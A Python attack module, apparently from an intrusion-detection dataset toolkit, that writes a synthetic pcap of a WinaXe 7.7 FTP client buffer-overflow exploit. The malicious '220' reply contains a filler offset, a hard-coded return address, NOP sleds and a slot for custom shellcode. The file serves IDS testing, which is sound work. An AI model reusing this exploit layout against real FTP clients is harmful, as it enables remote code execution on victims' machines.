import logging
import ID2TLib.Utility

from random import randint
from lea import Lea
from scapy.layers.inet import IP, Ether, TCP

from Attack import BaseAttack
from Attack.AttackParameters import Parameter as Param
from Attack.AttackParameters import ParameterTypes
from ID2TLib.Utility import update_timestamp, generate_source_port_from_platform, get_rnd_x86_nop, forbidden_chars,\
    get_rnd_bytes , check_payload_len, handle_most_used_outputs

# Suppress everything below ERROR level coming from scapy's runtime logger.
logging.getLogger(name="scapy.runtime").setLevel(level=logging.ERROR)
# noinspection PyPep8

# TCP port the victim connects to on the attacker (FTP control connection).
ftp_port = 21


class FTPWinaXeExploit(BaseAttack.BaseAttack):
    """
    Attack that injects a WinaXe 7.7 FTP exploit into a capture.

    The victim (IP_SOURCE, acting as FTP client) opens a TCP connection to ftp_port on the attacker
    (IP_DESTINATION, acting as FTP server). The attacker answers with a crafted "220" reply that carries
    the exploit payload and then closes the connection.
    """

    def __init__(self):
        """
        Creates a new instance of the FTPWinaXeExploit.

        Registers name, description and attack type with the base class and declares the supported
        parameters together with their types.
        """
        # Initialize attack
        super(FTPWinaXeExploit, self).__init__("FTPWinaXe Exploit", "Injects an WinaXe 7.7 FTP Exploit.",
                                               "Privilege elevation")

        # Define allowed parameters and their type
        self.supported_params.update({
            Param.IP_SOURCE: ParameterTypes.TYPE_IP_ADDRESS,
            Param.IP_DESTINATION: ParameterTypes.TYPE_IP_ADDRESS,
            Param.MAC_SOURCE: ParameterTypes.TYPE_MAC_ADDRESS,
            Param.MAC_DESTINATION: ParameterTypes.TYPE_MAC_ADDRESS,
            Param.INJECT_AT_TIMESTAMP: ParameterTypes.TYPE_FLOAT,
            Param.INJECT_AFTER_PACKET: ParameterTypes.TYPE_PACKET_POSITION,
            Param.IP_SOURCE_RANDOMIZE: ParameterTypes.TYPE_BOOLEAN,
            Param.PACKETS_PER_SECOND: ParameterTypes.TYPE_FLOAT,
            Param.CUSTOM_PAYLOAD: ParameterTypes.TYPE_STRING,
            Param.CUSTOM_PAYLOAD_FILE: ParameterTypes.TYPE_STRING
        })

    def init_params(self):
        """
        Initialize the parameters of this attack using the user supplied command line parameters.
        Use the provided statistics to calculate default parameters and to process user
        supplied queries.

        Defaults: the attacker (IP/MAC_DESTINATION) gets a freshly generated address in the most used IP class.
        The victim (IP/MAC_SOURCE) is a random valid address taken from the statistics.
        The packet rate is the mean of the sent/received rate of the most used IP address.
        The injection point is a random packet position.
        """
        # PARAMETERS: initialize with default values
        # (values are overwritten if user specifies them)
        most_used_ip_address = self.statistics.get_most_used_ip_address()

        # The most used IP class in background traffic
        most_used_ip_class = handle_most_used_outputs(self.statistics.process_db_query("most_used(ipClass)"))
        attacker_ip = self.generate_random_ipv4_address(most_used_ip_class)
        self.add_param_value(Param.IP_DESTINATION, attacker_ip)
        self.add_param_value(Param.MAC_DESTINATION, self.generate_random_mac_address())

        random_ip_address = self.statistics.get_random_ip_address()
        # victim should be valid and not equal to attacker
        # NOTE(review): this loop never terminates if the statistics contain no valid address other than attacker_ip
        while not self.is_valid_ip_address(random_ip_address) or random_ip_address == attacker_ip:
            random_ip_address = self.statistics.get_random_ip_address()

        self.add_param_value(Param.IP_SOURCE, random_ip_address)
        victim_mac = self.statistics.get_mac_address(random_ip_address)
        # presumably get_mac_address yields an empty list when no MAC is known -> fall back to a random MAC
        if isinstance(victim_mac, list) and len(victim_mac) == 0:
            victim_mac = self.generate_random_mac_address()
        self.add_param_value(Param.MAC_SOURCE, victim_mac)
        self.add_param_value(Param.PACKETS_PER_SECOND,
                             (self.statistics.get_pps_sent(most_used_ip_address) +
                              self.statistics.get_pps_received(most_used_ip_address)) / 2)
        self.add_param_value(Param.INJECT_AFTER_PACKET, randint(0, self.statistics.get_packet_count()))
        self.add_param_value(Param.IP_SOURCE_RANDOMIZE, 'False')
        self.add_param_value(Param.CUSTOM_PAYLOAD, '')
        self.add_param_value(Param.CUSTOM_PAYLOAD_FILE, '')

    def generate_attack_pcap(self):
        """
        Generates the attack packets and writes them to a pcap file.

        Packet sequence:
          1. Three-way handshake initiated by the victim towards ftp_port on the attacker.
          2. The attacker's exploit reply (PSH/ACK).
          3. The attacker's FIN/ACK.
          4. The victim's ACK of the exploit data.
          5. The victim's ACK of the FIN.

        :return: tuple of (number of generated packets, path of the written pcap file)
        """
        pps = self.get_param_value(Param.PACKETS_PER_SECOND)

        # Timestamp of the first packet, also stored as the start time of the attack
        timestamp_next_pkt = self.get_param_value(Param.INJECT_AT_TIMESTAMP)
        self.attack_start_utime = timestamp_next_pkt

        # Initialize parameters
        ip_victim = self.get_param_value(Param.IP_SOURCE)
        ip_attacker = self.get_param_value(Param.IP_DESTINATION)
        mac_victim = self.get_param_value(Param.MAC_SOURCE)
        mac_attacker = self.get_param_value(Param.MAC_DESTINATION)

        custom_payload = self.get_param_value(Param.CUSTOM_PAYLOAD)
        custom_payload_limit = 1000
        # The custom payload is embedded as encoded bytes, so its size has to be measured in bytes, not characters.
        # Measuring len(str) lets a non-ASCII payload pass this check and then exceed custom_payload_limit.
        check_payload_len(len(custom_payload.encode()), custom_payload_limit)

        packets = []

        # Create random victim if specified
        if self.get_param_value(Param.IP_SOURCE_RANDOMIZE):
            # The most used IP class in background traffic
            most_used_ip_class = handle_most_used_outputs(self.statistics.process_db_query("most_used(ipClass)"))
            ip_victim = self.generate_random_ipv4_address(most_used_ip_class, 1)
            mac_victim = self.generate_random_mac_address()

        # Get MSS, TTL and Window size value for victim/attacker IP
        victim_mss_value, victim_ttl_value, victim_win_value = self.get_ip_data(ip_victim)
        attacker_mss_value, attacker_ttl_value, attacker_win_value = self.get_ip_data(ip_attacker)

        # Only the minimum reply delay is used for spacing the packets
        min_delay, _ = self.get_reply_delay(ip_attacker)

        attacker_seq = randint(1000, 50000)
        victim_seq = randint(1000, 50000)

        sport = generate_source_port_from_platform("win7")

        # NOTE(review): TCP only negotiates MSS on SYN segments, yet every segment below carries the MSS option.
        # It is kept to leave the generated output unchanged.

        # connection request from victim (client)
        victim_ether = Ether(src=mac_victim, dst=mac_attacker)
        victim_ip = IP(src=ip_victim, dst=ip_attacker, ttl=victim_ttl_value, flags='DF')
        request_tcp = TCP(sport=sport, dport=ftp_port, window=victim_win_value, flags='S',
                          seq=victim_seq, options=[('MSS', victim_mss_value)])
        victim_seq += 1  # the SYN consumes one sequence number
        syn = (victim_ether / victim_ip / request_tcp)
        syn.time = timestamp_next_pkt
        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, min_delay)
        packets.append(syn)

        # response from attacker (server)
        attacker_ether = Ether(src=mac_attacker, dst=mac_victim)
        attacker_ip = IP(src=ip_attacker, dst=ip_victim, ttl=attacker_ttl_value, flags='DF')
        reply_tcp = TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='SA',
                        window=attacker_win_value, options=[('MSS', attacker_mss_value)])
        attacker_seq += 1  # the SYN/ACK consumes one sequence number
        synack = (attacker_ether / attacker_ip / reply_tcp)
        synack.time = timestamp_next_pkt
        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, min_delay)
        packets.append(synack)

        # acknowledgement from victim (client)
        ack_tcp = TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A',
                      window=victim_win_value, options=[('MSS', victim_mss_value)])
        ack = (victim_ether / victim_ip / ack_tcp)
        ack.time = timestamp_next_pkt
        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
        packets.append(ack)

        # FTP exploit packet
        ftp_tcp = TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='PA',
                      window=attacker_win_value, options=[('MSS', attacker_mss_value)])
        ftp_tcp.add_payload(self._build_exploit_reply(custom_payload, custom_payload_limit))

        ftp_buff = (attacker_ether / attacker_ip / ftp_tcp)
        ftp_buff.time = timestamp_next_pkt
        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
        packets.append(ftp_buff)
        # the exploit data advances the attacker's sequence number by its length
        attacker_seq += len(ftp_tcp.payload)

        # Fin Ack from attacker
        fin_ack_tcp = TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='FA',
                          window=attacker_win_value, options=[('MSS', attacker_mss_value)])
        fin_ack = (attacker_ether / attacker_ip / fin_ack_tcp)
        fin_ack.time = timestamp_next_pkt
        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, min_delay)
        packets.append(fin_ack)

        # Ack from victim on FTP packet
        ftp_ack_tcp = TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A',
                          window=victim_win_value, options=[('MSS', victim_mss_value)])
        ftp_ack = (victim_ether / victim_ip / ftp_ack_tcp)
        ftp_ack.time = timestamp_next_pkt
        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
        packets.append(ftp_ack)

        # Ack from victim on Fin/Ack of attacker (the FIN consumes one sequence number, hence +1)
        fin_ack_ack_tcp = TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq + 1, flags='A',
                              window=victim_win_value, options=[('MSS', victim_mss_value)])
        fin_ack_ack = (victim_ether / victim_ip / fin_ack_ack_tcp)
        fin_ack_ack.time = timestamp_next_pkt
        packets.append(fin_ack_ack)

        # store end time of attack (packets were appended in timestamp order)
        self.attack_end_utime = packets[-1].time

        # write attack packets to pcap
        pcap_path = self.write_attack_pcap(sorted(packets, key=lambda pkt: pkt.time))

        # return packets sorted by packet time_sec_start
        return len(packets), pcap_path

    def _build_exploit_reply(self, custom_payload, custom_payload_limit):
        """
        Builds the application data of the attacker's malicious FTP reply.

        Layout:
          1. b'220', the FTP "service ready" reply code.
          2. 2065 random filler bytes.
          3. A fixed 4-byte value.
          4. 10 NOP-sled bytes.
          5. The payload, padded to custom_payload_limit bytes.
          6. 20 NOP-sled bytes.
          7. CRLF.

        The payload is taken, in order of precedence, from:
          - custom_payload, front-padded with NOP-sled bytes;
          - the CUSTOM_PAYLOAD_FILE parameter, back-padded with NOP-sled bytes;
          - random bytes.

        Random generators are called in a fixed order so seeded runs stay reproducible.

        :param custom_payload: user supplied payload string ('' if none)
        :param custom_payload_limit: size in bytes the payload section is padded to
        :return: the reply bytes to use as TCP payload
        """
        reply = b'220'
        reply += get_rnd_bytes(2065, forbidden_chars)
        # presumably the overwritten return address (0x68017296, little-endian) -- TODO confirm against exploit
        reply += b'\x96\x72\x01\x68'
        reply += get_rnd_x86_nop(10, False, forbidden_chars)

        custom_payload_file = self.get_param_value(Param.CUSTOM_PAYLOAD_FILE)

        if custom_payload == '':
            if custom_payload_file == '':
                payload = get_rnd_bytes(custom_payload_limit, forbidden_chars)
            else:
                payload = ID2TLib.Utility.get_bytes_from_file(custom_payload_file)
                check_payload_len(len(payload), custom_payload_limit)
                payload += get_rnd_x86_nop(custom_payload_limit - len(payload), False, forbidden_chars)
        else:
            encoded_payload = custom_payload.encode()
            # pad by the encoded byte length so multi-byte characters cannot push the payload past the limit
            payload = get_rnd_x86_nop(custom_payload_limit - len(encoded_payload), False, forbidden_chars)
            payload += encoded_payload

        reply += payload
        reply += get_rnd_x86_nop(20, False, forbidden_chars)
        reply += b'\r\n'
        return reply